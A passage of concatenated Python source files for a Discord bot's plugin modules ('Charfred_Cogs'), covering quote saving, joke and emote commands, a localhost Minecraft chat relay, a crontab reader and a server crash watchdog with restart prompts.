for msg in msgs:
outmsg = await self.send(msg, deletable, codeblocked=codeblocked)
return outmsg
async def sendmarkdown(self, msg, deletable=True):
"""Helper function that wraps a given message in markdown codeblocks
and sends if off.
Because laziness is the key to great success!
"""
return await self.send(f'```markdown\n{msg}\n```', deletable=deletable, codeblocked=True)
async def promptinput(self, prompt: str, timeout: int=120, deletable=True):
"""Prompt for text input.
Returns a tuple of acquired input,
reply message, and boolean indicating prompt timeout.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
return (r.content, r, False)
async def promptconfirm(self, prompt: str, timeout: int=120, deletable=True):
"""Prompt for confirmation.
Returns a triple of acquired confirmation,
reply message, and boolean indicating prompt timeout.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
if re.match('^(y|yes)', r.content, flags=re.I):
return (True, r, False)
else:
return (False, r, False)
async def promptconfirm_or_input(self, prompt: str, timeout: int=120,
deletable=True, confirm=True):
"""Prompt for confirmation or input at the same time.
Instead of 'yes/no' this lets your prompt for 'yes/input' or 'no/input',
depending on the 'confirm' kwarg.
Returns a 3 tuple of input, reply message object
and boolean indicating prompt timeout.
'input' will be None, if 'yes' for confirm=True (the default),
or 'no' for confirm=False.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
if confirm:
pat = '^(y|yes)'
else:
pat = '^(n|no)'
if re.match(pat, r.content, flags=re.I):
return (None, r, False)
else:
return (r.content, r, False)
``` |
{
"source": "jinkhya/Charfred_Cogs",
"score": 3
} |
#### File: Charfred_Cogs/datacogs/quote.py
```python
import logging
import discord
from random import randrange
from discord.ext import commands
from utils import Config, Flipbook, permission_node
log = logging.getLogger('charfred')
class Quotator(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.quotes = Config(f'{bot.dir}/data/quotes.json',
load=True, loop=self.loop)
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
if str(reaction.emoji) == '💾' and reaction.count == 1:
if user.bot or reaction.message.author.bot:
return
log.info('Saving a quote!')
quotee = reaction.message.author
if reaction.message.attachments:
urls = []
for a in reaction.message.attachments:
urls.append(a.url)
urls = '\n'.join(urls)
quote = f'{reaction.message.content}\n{urls}'
else:
quote = reaction.message.content
if not quote:
await reaction.message.add_reaction('🖕')
return
id = str(quotee.id)
if id not in self.quotes:
self.quotes[id] = []
self.quotes[id].append({'quote': quote,
'savedBy': user.id})
await self.quotes.save()
await reaction.message.add_reaction('👌')
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.quote')
async def quote(self, ctx, member: discord.Member=None, _index: int=None):
"""User Quote commands.
This returns a list of all users that are registered in the
quote repository, if no subcommand was given.
"""
if member and str(member.id) in self.quotes:
id = str(member.id)
if _index is None:
log.info('Random quote!')
_index = randrange(len(self.quotes[id]))
q = self.quotes[id][_index]['quote']
else:
try:
log.info('Specific quote!')
q = self.quotes[id][_index]['quote']
except (KeyError, IndexError):
log.info('No quote with that index!')
await ctx.send('Sorry sir, there is no quote under that number!')
return
if member.nick:
name = member.nick
else:
name = member.name
await ctx.send(f'{q}\n\n_{name}; Quote #{_index}_')
else:
converter = commands.MemberConverter()
async def getName(id):
try:
member = await converter.convert(ctx, id)
except commands.errors.BadArgument:
log.warning(f'{id} could not be resolved; removed from quotes!')
del self.quotes[id]
await self.quotes.save()
return None
if member.nick:
return member.nick
else:
return member.name
members = '\n'.join(filter(None, [await getName(id) for id in list(self.quotes.keys())]))
await ctx.send(f'I have quotes from these members:\n ```\n{members}\n```')
@quote.command(aliases=['delete', 'unquote'])
async def remove(self, ctx, member: discord.Member, *, _index: int):
"""Remove a specific quote.
Takes the user who was quoted, and
the ID of the quote to be removed,
which is shown at the bottom of each
quote.
Only the user who saved the quote,
and the quoted user can do this.
"""
if str(member.id) in self.quotes:
id = str(member.id)
log.info('Removing a quote!')
try:
if ctx.author.id == member.id or \
ctx.author.id == self.quotes[id][_index]['savedBy']:
del self.quotes[id][_index]
await ctx.send('We shall never speak of it again, sir!')
await self.quotes.save()
else:
await ctx.send('I am sorry, sir, but you are neither the quotee, '
'nor the person who requested this quote to be saved.')
except KeyError:
log.info('Unknown quote, cannot remove!')
await ctx.send('Sorry sir, I don\'t seem to have a record of this quote.')
else:
log.info('Unknown member!')
await ctx.send('Sorry lass, I don\'t seem to have heard of this person before.')
@quote.command(name='list')
async def _list(self, ctx, member: discord.Member):
"""List all quotes from a specific user.
Quotes are presented as a nice flipbook, for
easy and non-spammy perusal!
"""
if str(member.id) in self.quotes:
id = str(member.id)
log.info('Showing quotes!')
quotelist = []
for index, quotemeta in enumerate(self.quotes[id]):
quote = quotemeta['quote']
quotelist.append(f'#{index}: {quote:.50}')
if member.nick:
name = member.nick
else:
name = member.name
quoteFlip = Flipbook(ctx, quotelist, entries_per_page=12,
title=f'Shit {name} says!',
color=discord.Color.blurple(),
close_on_exit=True)
await quoteFlip.flip()
else:
log.info('Unknown member!')
await ctx.send('Sorry lass, I don\'t seem to have heard of this person before.')
def setup(bot):
bot.register_nodes([f'{__name__}.quote'])
bot.add_cog(Quotator(bot))
```
#### File: Charfred_Cogs/funcogs/chuck.py
```python
import logging
from discord.ext import commands
log = logging.getLogger('charfred')
class Chuck(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.session = bot.session
@commands.group(invoke_without_command=True, aliases=['chuck', 'roundhouse'])
@commands.cooldown(60, 60)
async def norris(self, ctx):
"""Interactions with ChuckNorrisJokes API.
This gets a random joke, if no subcommand was given.
"""
log.info('Getting random chuck joke.')
async with self.session.get('https://api.chucknorris.io/jokes/random') as r:
joke = await r.json()
await ctx.send(f"`{joke['value']}`")
@norris.command()
async def category(self, ctx, category: str=None):
"""Get a random joke from a category!
If no category is given, this will return
the list of all categories.
"""
if category is None:
log.info('Retrieving categories.')
async with self.session.get('https://api.chucknorris.io/jokes/categories') as r:
cats = await r.json()
cats = ', '.join(cats)
await ctx.send(f'Available categories: `{cats}`')
else:
log.info(f'Trying for a random joke from {category}.')
async with self.session.get(f'https://api.chucknorris.io/jokes/random?category={category}') as r:
joke = await r.json()
await ctx.send(f"`{joke['value']}`")
def setup(bot):
bot.add_cog(Chuck(bot))
```
#### File: Charfred_Cogs/funcogs/entertain.py
```python
import logging
import random
import asyncio
from discord.ext import commands
log = logging.getLogger('charfred')
dances = [
[u"└|゚ε゚|┐", u"┌|゚з゚|┘", u"└|゚ε゚|┐", u"┌|゚з゚|┘", u"└|゚ε゚|┐", u"┌|゚з゚|┘"],
[u"└|∵┌|", u"|┐∵|┘", u"└|∵┌|", u"|┐∵|┘", u"└|∵┌|", u"|┐∵|┘"],
[u"(o^^)o", u"o(^^o)", u"(o^^)o", u"o(^^o)", u"(o^^)o", u"o(^^o)"],
[u"|o∵|o", u"o|∵o|", u"|o∵|o", u"o|∵o|", u"|o∵|o", u"o|∵o|"],
[u"(ノ ̄ー ̄)ノ", u"(〜 ̄△ ̄)〜", u"(ノ ̄ω ̄)ノ", u"(ノ ̄ー ̄)ノ", u"(〜 ̄△ ̄)〜", u"(ノ ̄ω ̄)ノ"]
]
faces = [
u"(´﹃`)", u"(・ε・`)", u"(ง •̀ω•́)ง✧", u"╭( ・ㅂ・)و", u"ಠ‿↼", u"d(-_^)", u"d(´・ω・`)",
u"٩(^ᴗ^)۶", u"ಥ◡ಥ", u"⚈ ̫ ⚈", u"∠(^ー^)", u"(^-^)ゝ", u"(∩^o^)⊃━☆゚.*・。゚", u"ლ(・ヮ・ლ)"
]
pleasures = [
'My pleasure, sir!', 'My pleasure, ma\'am', 'You are very welcome, sir!',
'You are very welcome, madam!', 'Of course, your highness!', 'Of course, your ladyship!',
'M\'lord *tips tophat*', 'Indubitably!', 'Fuck you!', '...', ' '
]
loves = [
u"•́ε•̀٥", u"˶⚈Ɛ⚈˵", u"(・ε・`)", u"(~ ̄³ ̄)~", u".+(´^ω^`)+.", u"゚*。(・∀・)゚*。", u"",
u"(∩^o^)⊃━☆゜.*", u"ಠ◡ಠ", u"ʢᵕᴗᵕʡ", u"(^¬^)", u"(º﹃º)", u"ಠ_ರೃ", u"d(´・ω・`)"
]
gn9s = [
'Good night, sir!', 'Good night!', 'Nighty night!', 'Sweet dreams!',
'Sleep well!', 'Don\'t let the bedbugs bite!', 'Pleasant dreams!',
'Glorious dreams to you, too!'
]
shrugs = [
u"┐( ̄ヘ ̄)┌", u"ლ(╹ε╹ლ)", u"ლ(ಠ益ಠ)ლ", u"¯\_(⊙_ʖ⊙)_/¯",
u"¯\_(ツ)_/¯", u"┐(´ー`)┌", u"乁༼☯‿☯✿༽ㄏ", u"╮(╯_╰)╭"
]
shocks = [
u"(ʘᗩʘ’)", u"(ʘ言ʘ╬)", u"(◯Δ◯∥)", u"(●Ω●;)"
]
spins = [
[u"(・ω・)", u"( ・ω)", u"( ・)", u"( )", u"(・ )", u"(ω・ )", u"(・ω・)"],
[u"(´・ω・`)", u"( ´・ω・)", u"( ´・ω)", u"( )", u"( )", u"(ω・´ )", u"(・ω・´)", u"(`・ω・´)"],
[u"(・▽・)", u"( ・▽)", u"( ・)", u"( )", u"(・ )", u"(▽・ )", u"(・▽・)"],
[u"(・_・)", u"( ・_)", u"( ・)", u"( )", u"(・ )", u"(_・ )", u"(・_・)"],
[u"(°o°)", u"(°o。)", u"(。o。)", u"(。o°)", u"(°o°)", u"(°o。)", u"(。o。)", u"(。o°)"]
]
class Entertain(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
@commands.command(aliases=['partytime'])
async def dance(self, ctx):
dance = random.choice(dances)
step = await ctx.send(dance[0], deletable=False)
await asyncio.sleep(2, loop=self.loop)
for move in dance[1:]:
await step.edit(content=move)
await asyncio.sleep(2, loop=self.loop)
else:
await step.add_reaction('👍')
@commands.command(aliases=['youspinmerightroundbabyrightround'])
async def spin(self, ctx):
spin = random.choice(spins)
step = await ctx.send(spin[0], deletable=False)
await asyncio.sleep(2, loop=self.loop)
for turn in spin[1:]:
await step.edit(content=turn)
await asyncio.sleep(2, loop=self.loop)
else:
await step.add_reaction('👍')
@commands.command(aliases=['*shrug*'])
async def shrug(self, ctx):
await ctx.send(random.choice(shrugs))
@commands.command(aliases=['jikes'])
async def shock(self, ctx):
await ctx.send(random.choice(shocks))
@commands.command(aliases=['flip', 'table'])
async def tableflip(self, ctx):
unflipped = await ctx.send(u"(ಠ_ಠ) ┳━┳", deletable=False)
await asyncio.sleep(2, loop=self.loop)
await unflipped.edit(content=u"(╯ಠ_ಠ)╯︵┻━┻")
@commands.command(aliases=['thank'])
async def thanks(self, ctx):
await ctx.send(random.choice(pleasures) + ' ' +
random.choice(faces))
@commands.command(aliases=['gn9', 'gn8', 'goodnight', 'nn'])
async def gn(self, ctx):
await ctx.send(random.choice(gn9s) + ' ' +
random.choice(loves))
def setup(bot):
bot.add_cog(Entertain(bot))
```
#### File: Charfred_Cogs/minecraftcogs/chatrelay.py
```python
import logging
import asyncio
from concurrent.futures import CancelledError
from discord.ext import commands
from utils import Config, permission_node
log = logging.getLogger('charfred')
formats = {
'MSG': '[**{}**] {}: {}',
'STF': '**{}**: {}',
'DTH': '[**{}**] {} {}',
'ME': '[**{}**] {}: {}',
'SAY': '[**{}**] {}: {}',
'SYS': '{}'
}
def escape(string):
return string.strip().replace('\n', '\\n').replace('::', ':\:').replace('::', ':\:')
class ChatRelay(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.server = None
self.inqueue = asyncio.Queue(maxsize=64, loop=self.loop)
self.clients = {}
self.inqueue_worker_task = None
self.relaycfg = Config(f'{bot.dir}/configs/chatrelaycfg.toml',
load=True, loop=self.loop)
if 'ch_to_clients' not in self.relaycfg:
self.relaycfg['ch_to_clients'] = {}
self.relaycfg._save()
if 'client_to_ch' not in self.relaycfg:
self.relaycfg['client_to_ch'] = {}
self.relaycfg._save()
def cog_unload(self):
if self.server:
log.info('CR: Closing relay server.')
self.server.close()
if self.inqueue_worker_task:
self.inqueue_worker_task.cancel()
if self.clients:
for client in self.clients.values():
try:
client['workers'][0].cancel()
client['workers'][1].cancel()
except KeyError:
pass
self.loop.create_task(self.server.wait_closed())
@commands.Cog.listener()
async def on_message(self, message):
if self.server is None: # Don't even do anything if the server isn't running.
return
if message.author.bot or (message.guild is None):
return
ch_id = str(message.channel.id)
if message.content and (ch_id in self.relaycfg['ch_to_clients']):
# Check whether the message is a command, as determined
# by having a valid prefix, and don't proceed if it is.
prefix = await self.bot.get_prefix(message)
if isinstance(prefix, str):
if message.content.startswith(prefix):
return
else:
try:
if message.content.startswith(tuple(prefix)):
return
except TypeError:
# If we get here, then the prefixes are borked.
raise
content = f'MSG::Discord::{escape(message.author.display_name)}:' \
f':{escape(message.clean_content)}::\n'
for client in self.relaycfg['ch_to_clients'][ch_id]:
try:
self.clients[client]['queue'].put_nowait((5, content))
except KeyError:
pass
except asyncio.QueueFull:
pass
@commands.group(invoke_without_command=True)
async def chatrelay(self, ctx):
"""Minecraft chat relay commands.
This returns a list of all Minecraft servers currently
connected and what channel they're linked to.
"""
info = ['# Chat Relay Status:']
if self.server and self.server.sockets:
info.append('\n# Relay server is online.\n')
else:
info.append('\n< Relay server is offline! >\n')
if self.clients:
info.append('\n# Currently connected clients:')
for client in self.clients:
info.append(f'- {client}')
if self.relaycfg['ch_to_clients']:
info.append('\n# Relay configuration:')
for channel_id, clients in self.relaycfg['ch_to_clients'].items():
channel = self.bot.get_channel(int(channel_id))
info.append(f'{channel.name if channel else channel_id}:')
if clients:
for client in clients:
info.append(f'- {client}')
else:
info.append('\n')
else:
info.append('> No clients configured.\n')
if len(info) == 2:
info.append('> No clients connected, nothing configured.')
await ctx.sendmarkdown('\n'.join(info))
async def incoming_worker(self, reader, client):
log.info(f'CR-Incoming: Worker for {client} started.')
try:
while True:
data = await reader.readline()
if not data:
log.info(f'CR-Incoming: {client} appears to have disconnected!')
break
try:
data = data.decode()
except UnicodeDecodeError as e:
log.info(f'CR-Incoming: {e}')
continue
try:
self.inqueue.put_nowait((client, data))
except asyncio.QueueFull:
log.warning(f'CR-Incoming: Incoming queue full, message dropped!')
except CancelledError:
raise
finally:
log.info(f'CR-Incoming: Worker for {client} exited.')
async def outgoing_worker(self, writer, client):
log.info(f'CR-Outgoing: Worker for {client} started.')
try:
while True:
try:
_, data = await self.clients[client]['queue'].get()
except (KeyError, AttributeError):
log.error(f'CR-Outgoing: Outqueue for {client} is gone!'
' Connection shutting down!')
break
else:
data = data.encode()
writer.write(data)
await writer.drain()
except CancelledError:
raise
finally:
log.info(f'CR-Outgoing: Worker for {client} exited.')
async def connection_handler(self, reader, writer):
peer = str(writer.get_extra_info("peername"))
log.info(f'CR-Connection: New connection established with {peer}!')
handshake = await reader.readline()
if not handshake:
log.warning(f'CR-Connection: No handshake from {peer} recieved!'
' Connection shutting down!')
writer.close()
return
handshake = handshake.decode()
hshk = handshake.split('::')
if hshk[0] == 'HSHK':
try:
client = hshk[1]
except IndexError:
log.warning(f'CR-Connection: Invalid handshake: {handshake}')
client = None
else:
log.warning(f'CR-Connection: Invalid handshake: {handshake}')
client = None
if client is None:
log.warning(f'CR-Connection: Using client address as name.')
client = peer
await self.inqueue.put((client, f'SYS::```markdown\n# {client} connected!\n```'))
if client in self.clients and self.clients[client]:
if 'worker' in self.clients[client]:
log.warning(f'CR-Connection: {client} reconnecting after messy exit, cleaning up!')
for worker in self.clients[client]['workers']:
worker.cancel()
self.clients[client] = {}
self.clients[client]['queue'] = asyncio.PriorityQueue(maxsize=24, loop=self.loop)
in_task = self.loop.create_task(self.incoming_worker(reader, client))
out_task = self.loop.create_task(self.outgoing_worker(writer, client))
self.clients[client]['workers'] = (in_task, out_task)
_, waiting = await asyncio.wait([in_task, out_task],
return_when=asyncio.FIRST_COMPLETED)
for task in waiting:
task.cancel()
try:
baggage = self.clients.pop(client)
except KeyError:
pass
else:
log.info(f'CR-Connection: Outqueue for {client} removed with'
f' {baggage["queue"].qsize()} items.')
writer.close()
log.info(f'CR-Connection: Connection with {client} closed!')
await self.inqueue.put((client, f'SYS::```markdown\n< {client} disconnected! >\n```'))
async def inqueue_worker(self):
log.info('CR-Inqueue: Worker started!')
try:
while True:
client, data = await self.inqueue.get()
# Check if the data has a valid format.
_data = data.split('::')
if _data[0] not in formats:
log.debug(f'CR-Inqueue: Data from {client} with invalid format: {data}')
continue
# If we get here, then the format is valid and we can relay to other clients.
if _data[0] != 'SYS':
for other in self.clients:
if other == client:
continue
try:
self.clients[other]['queue'].put_nowait((5, data))
except KeyError:
pass
except asyncio.QueueFull:
pass
# Check if we have a channel to send this message to.
if client not in self.relaycfg['client_to_ch']:
log.debug(f'CR-Inqueue: No channel for: "{client} : {data}", dropping!')
continue
# If we get here, we have a channel and can process according to format map.
channel = self.bot.get_channel(int(self.relaycfg['client_to_ch'][client]))
if not channel:
log.warning(f'CR-Inqueue: {_data[0]} message from {client} could not be sent.'
' Registered channel does not exist!')
continue
try:
await channel.send(formats[_data[0]].format(*_data[1:]))
except IndexError as e:
log.debug(f'{e}: {data}')
pass
except CancelledError:
raise
finally:
log.info('CR-Inqueue: Worker exited.')
@chatrelay.command(aliases=['start', 'init'])
@permission_node(f'{__name__}.init')
async def initialize(self, ctx, port):
"""This initializes the relay server on the given port,
allowing connections from Minecraft servers to be established.
Be sure to also set up at least one channel to relay chat
to and from, using the 'register' subcommand, otherwise
chat recieved from clients will just be dropped!
"""
if self.server:
log.warning('CR: Server already established!')
await ctx.sendmarkdown('> Relay server already running!')
return
self.inqueue_worker_task = self.loop.create_task(self.inqueue_worker())
self.server = await asyncio.start_server(self.connection_handler, '127.0.0.1', port,
loop=self.loop)
log.info('CR: Server started!')
await ctx.sendmarkdown('# Relay server started.')
@chatrelay.command(aliases=['stop'])
@permission_node(f'{__name__}.init')
async def close(self, ctx):
"""This closes the relay server, disconnecting all clients.
"""
if not self.server:
log.info('CR: No server to be closed.')
await ctx.sendmarkdown('> No relay server to be closed.')
return
self.server.close()
if self.inqueue_worker_task:
self.inqueue_worker_task.cancel()
if self.clients:
for client in self.clients.values():
try:
client['workers'][0].cancel()
client['workers'][1].cancel()
except KeyError:
pass
await self.server.wait_closed()
log.info('CR: Server closed!')
self.server = None
await ctx.sendmarkdown('# Relay server closed, all clients disconnected!')
@chatrelay.command(aliases=['listen'])
@permission_node(f'{__name__}.register')
async def register(self, ctx, client: str):
"""Registers a channel to recieve chat from a given client,
and send chat from the channel to the client.
The channel you run this in will be the registered channel.
You can get a list of clients by just running 'chatrelay'
without a subcommand.
"""
channel_id = str(ctx.channel.id)
if client not in self.clients:
await ctx.sendmarkdown('< Client unknown, registering anyway. >\n'
'< Please check if you got the name right,'
' when the client eventually connects. >')
log.info(f'CR: Trying to register {ctx.channel.name} for {client}.')
if client in self.relaycfg['client_to_ch'] and self.relaycfg['client_to_ch'][client]:
channel = self.bot.get_channel(int(self.relaycfg['client_to_ch'][client]))
if channel == ctx.channel:
await ctx.sendmarkdown(f'> {client} is already registered with this channel!')
else:
await ctx.sendmarkdown(f'< {client} is already registered with {channel.name}! >\n'
'> A client can only be registered to one channel.\n'
'> Please unregister the other channel first!')
return
else:
self.relaycfg['client_to_ch'][client] = channel_id
if channel_id in self.relaycfg['ch_to_clients']:
self.relaycfg['ch_to_clients'][channel_id].append(client)
else:
self.relaycfg['ch_to_clients'][channel_id] = [client]
await self.relaycfg.save()
await ctx.sendmarkdown(f'# {ctx.channel.name} is now registered for'
f' recieving chat from, and sending chat to {client}.')
@chatrelay.command(aliases=['unlisten'])
@permission_node(f'{__name__}.register')
async def unregister(self, ctx, client: str):
"""Unregisters a channel from recieving chat from a given
client or sending chat to that client.
The channel you run this in will be the unregistered channel.
You can get a list of clients by just running 'chatrelay'
without a subcommand.
"""
channel_id = str(ctx.channel.id)
log.info(f'CR: Trying to unregister {ctx.channel.name} for {client}.')
if client in self.relaycfg['client_to_ch']:
if self.relaycfg['client_to_ch'][client] == channel_id:
del self.relaycfg['client_to_ch'][client]
else:
await ctx.sendmarkdown(f'< {client} is not registered for this channel! >')
return
try:
self.relaycfg['ch_to_clients'][channel_id].remove(client)
except ValueError:
log.critical(f'CR: Relay mapping inconsistency detected!')
raise
else:
await ctx.sendmarkdown('# This channel will no longer send chat to'
f' or recieve chat from {client}!')
finally:
await self.relaycfg.save()
else:
await ctx.sendmarkdown(f'> {client} is not registered with any channel.')
def setup(bot):
permission_nodes = ['init', 'register']
bot.register_nodes([f'{__name__}.{node}' for node in permission_nodes])
bot.add_cog(ChatRelay(bot))
```
#### File: Charfred_Cogs/minecraftcogs/cronreader.py
```python
from discord.ext import commands
import re
import asyncio
import logging
from utils import permission_node, Flipbook
log = logging.getLogger('charfred')
cronpat = re.compile('^(?P<disabled>#)*((?P<reboot>@reboot)|(?P<min>(\*/\d+|\*|(\d+,?)+))\s(?P<hour>(\*/\d+|\*|(\d+,?)+))\s(?P<day>(\*/\d+|\*|(\d+,?)+)))\s.*spiffy\s(?P<cmd>\w+)\s(?P<server>\w+)\s(?P<args>.*)>>')
every = '*/'
always = '*'
class CronReader(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.servercfg = bot.servercfg
def _parseCron(self, crontab):
parsedlines = []
for l in crontab:
if 'spiffy' not in l:
continue
match = cronpat.match(l)
if not match:
continue
disabled, reboot, min, hour, day, cmd, server, args = match.group('disabled',
'reboot',
'min', 'hour',
'day', 'cmd',
'server', 'args')
state = '# ' if disabled else ''
if reboot:
condition = 'Runs at reboot:'
output = f'{state}{condition} {cmd} {server}'
if args:
output += f' {args}'
parsedlines.append(output)
else:
condition = 'Runs'
if every in min:
m = f'every {min[2:]} minutes'
elif always in min:
m = 'every minute'
else:
m = f'at {min} minutes'
if every in hour:
h = f'every {hour[2:]} hours'
elif always in hour:
h = 'every hour'
else:
h = f'at {hour} hours'
if every in day:
d = f'every {day[2:]} days'
elif always in day:
d = 'every day'
else:
d = f'on these days: {day}'
output = f'{state}{condition} {m}, {h}, {d}: {cmd} {server}'
if args:
output += f' {args}'
parsedlines.append(output)
return parsedlines
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.read')
async def cron(self, ctx):
"""Crontab commands.
This returns an overview of cronjobs that apply to any known minecraft
servers managed by Charfreds \'spiffy\' script, if no subcommand was given.
"""
log.info('Fetching current crontab...')
proc = await asyncio.create_subprocess_exec(
'crontab',
'-l',
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await proc.communicate()
if proc.returncode == 0:
log.info('Crontab retrieved successfully.')
else:
log.warning('Failed to retrieve crontab!')
return
crontab = stdout.decode().strip().split('\n')
log.info('Parsing crontab...')
spiffycron = await self.loop.run_in_executor(None, self._parseCron, crontab)
cronFlip = Flipbook(ctx, spiffycron, entries_per_page=8, title='Spiffy Cronjobs',
close_on_exit=True)
await cronFlip.flip()
def setup(bot):
bot.register_nodes([f'{__name__}.read'])
bot.add_cog(CronReader(bot))
```
#### File: Charfred_Cogs/minecraftcogs/serverwatchdog.py
```python
from discord.ext import commands
from discord.utils import find
import asyncio
import logging
import re
from time import strftime, localtime, time
from threading import Event
from utils import Config, permission_node
from .utils import isUp, getProc, serverStart, getcrashreport, parsereport, formatreport
log = logging.getLogger('charfred')
cronpat = re.compile(r'^(?P<disabled>#)*((?P<reboot>@reboot)|(?P<min>(\*/\d+|\*|(\d+,?)+))\s(?P<hour>(\*/\d+|\*|(\d+,?)+))\s(?P<day>(\*/\d+|\*|(\d+,?)+)))\s.*spiffy\s(?P<cmd>\w+)\s(?P<server>\w+)\s(?P<args>.*)>>')
every = '*/'
always = '*'
class Watchdog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.servercfg = bot.servercfg
self.watchdogs = {}
self.watchcfg = Config(f'{bot.dir}/configs/watchcfg.json',
load=True, loop=self.loop)
if 'notify' not in self.watchcfg:
self.watchcfg['notify'] = '@here'
def cog_unload(self):
if self.watchdogs:
for fut, event in self.watchdogs.values():
event.set()
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.watchdog')
async def watchdog(self, ctx):
"""Server process watchdog commands.
This returns a list of all active watchdogs,
if no subcommand was given.
"""
for server, wd in self.watchdogs.items():
if wd[0].done():
await ctx.sendmarkdown(f'< {server} watchdog inactive! >')
else:
await ctx.sendmarkdown(f'# {server} watchdog active!')
@watchdog.command(aliases=['blame'])
async def setmention(self, ctx, mentionee: str):
"""Set who to mention for crash notification."""
log.info(f'Setting role to mention to: {mentionee}.')
role = find(lambda r: r.name == mentionee, ctx.guild.roles)
if role:
self.watchcfg['notify'] = role.mention
await ctx.sendmarkdown(f'# Set role to mention to: {mentionee}!\n'
'> They will be notified if a crash is suspected,\n'
'> given that mentioning is enabled.')
await self.watchcfg.save()
log.info('Watchdog cfg saved!')
else:
await ctx.sendmarkdown(f'< {mentionee} is not a valid role! >')
log.warning('Role could not be found, role to mention unchanged.')
async def _wdstart(self, ctx, server):
if server in self.watchdogs and not self.watchdogs[server][0].done():
log.info(f'{server} watchdog active.')
await ctx.sendmarkdown('# Watchdog already active!')
else:
if server not in self.servercfg['servers']:
log.warning(f'{server} has been misspelled or not configured!')
await ctx.sendmarkdown(f'< {server} has been misspelled or not configured! >')
return
if isUp(server):
log.info('Starting watchdog on online server.')
await ctx.sendmarkdown(f'# {server} is up and running.', deletable=False)
else:
log.info('Starting watchdog on offline server.')
await ctx.sendmarkdown(f'< {server} is not running. >', deletable=False)
async def serverGone(crashed, report=None):
if crashed:
await ctx.send(
f'{self.watchcfg["notify"]}\n'
'```markdown\n'
f'< {strftime("%H:%M", localtime())} : {server} crashed! >\n'
'```',
deletable=False
)
for c in report:
await asyncio.sleep(1, loop=self.loop)
await ctx.sendmarkdown(c)
else:
await ctx.sendmarkdown(f'> {strftime("%H:%M", localtime())} : {server} is gone!\n'
'> Watching for it to return...', deletable=False)
async def serverBack():
await ctx.sendmarkdown('# ' + strftime("%H:%M") + f' {server} is back online!\n'
'> Continuing watch!', deletable=False)
async def watchGone():
await ctx.sendmarkdown(f'> Ended watch on {server}!', deletable=False)
async def startServer():
# TODO: Remove message informing about the change from 'react to restart' to 'react to abort'
abortPrompt = await ctx.sendmarkdown(
'< IMPORTANT NOTE: The purpose of this prompt has changed, please read it carefully! >\n\n'
f'# Attempting to start {server} back up again in 90 seconds!\n'
'< Please react to this message with ✋ to abort! >',
deletable=False
)
await abortPrompt.add_reaction('✋')
def abortcheck(reaction, user):
if reaction.message.id != abortPrompt.id:
return False
return str(reaction.emoji) == '✋' and not user.bot
log.info(f'Prompting {server} start abort... 90 seconds.')
try:
await self.bot.wait_for('reaction_add', timeout=90, check=abortcheck)
except asyncio.TimeoutError:
log.info('Prompt timed out.')
await abortPrompt.clear_reactions()
await abortPrompt.edit(content='```markdown\n> Prompt to abort'
' timed out!\n```')
await asyncio.sleep(5, loop=self.loop)
if isUp(server):
log.info(f'{server} is already back!')
await abortPrompt.edit(content=f'```markdown\n> {server} is already back!\n```')
else:
log.info(f'Starting {server}')
await abortPrompt.edit(content=f'```markdown\n> Starting {server}...\n```')
await serverStart(server, self.servercfg, self.loop)
else:
await abortPrompt.clear_reactions()
await abortPrompt.edit(content=f'```markdown\n> Startup of {server} aborted!\n```')
def watchDone(future):
log.info(f'WD: Ending watch on {server}.')
if future.exception():
log.warning(f'WD: Exception in watchdog for {server}!')
raise future.exception()
asyncio.run_coroutine_threadsafe(watchGone(), self.loop)
def watch(event):
log.info(f'WD: Starting watch on {server}.')
serverProc = getProc(server)
if serverProc and serverProc.is_running():
lastState = True
else:
lastState = False
while not event.is_set():
if lastState:
if not serverProc.is_running():
log.info(f'WD: {server} is gone!')
lastState = False
now = time()
rpath, mtime = getcrashreport(server, self.servercfg['serverspath'])
if mtime > (now - 60):
crashed = True
ctime, desc, strace, flav, lev, bl, ph = parsereport(rpath)
report = formatreport(
rpath, ctime, desc, flav, strace, lev, bl, ph
)
coro = serverGone(crashed, report)
else:
crashed = False
coro = serverGone(crashed)
asyncio.run_coroutine_threadsafe(coro, self.loop)
if crashed:
asyncio.run_coroutine_threadsafe(startServer(), self.loop)
event.wait(timeout=30)
event.wait(timeout=20)
else:
serverProc = getProc(server)
if serverProc and serverProc.is_running():
log.info(f'WD: {server} is back online!')
lastState = True
asyncio.run_coroutine_threadsafe(serverBack(), self.loop)
event.wait(timeout=20)
else:
event.wait(timeout=30)
else:
return
event = Event()
watchFuture = self.loop.run_in_executor(None, watch, event)
watchFuture.add_done_callback(watchDone)
self.watchdogs[server] = (watchFuture, event)
await ctx.sendmarkdown('# Watchdog activated!', deletable=False)
@watchdog.command(name='activate', aliases=['start', 'watch'])
async def wdstart(self, ctx, *servers: str):
"""Start the process watchdog for a server."""
for server in servers:
await self._wdstart(ctx, server)
@watchdog.command(name='deactivate', aliases=['stop', 'unwatch'])
async def wdstop(self, ctx, server: str):
"""Stop the process watchdog for a server."""
if server in self.watchdogs and not self.watchdogs[server][0].done():
watcher = self.watchdogs[server]
watcher[1].set()
await ctx.sendmarkdown(f'> Terminating {server} watchdog...', deletable=False)
else:
if server not in self.servercfg['servers']:
log.warning(f'{server} has been misspelled or not configured!')
await ctx.sendmarkdown(f'< {server} has been misspelled or not configured! >')
else:
await ctx.sendmarkdown('# Watchdog already inactive!', deletable=False)
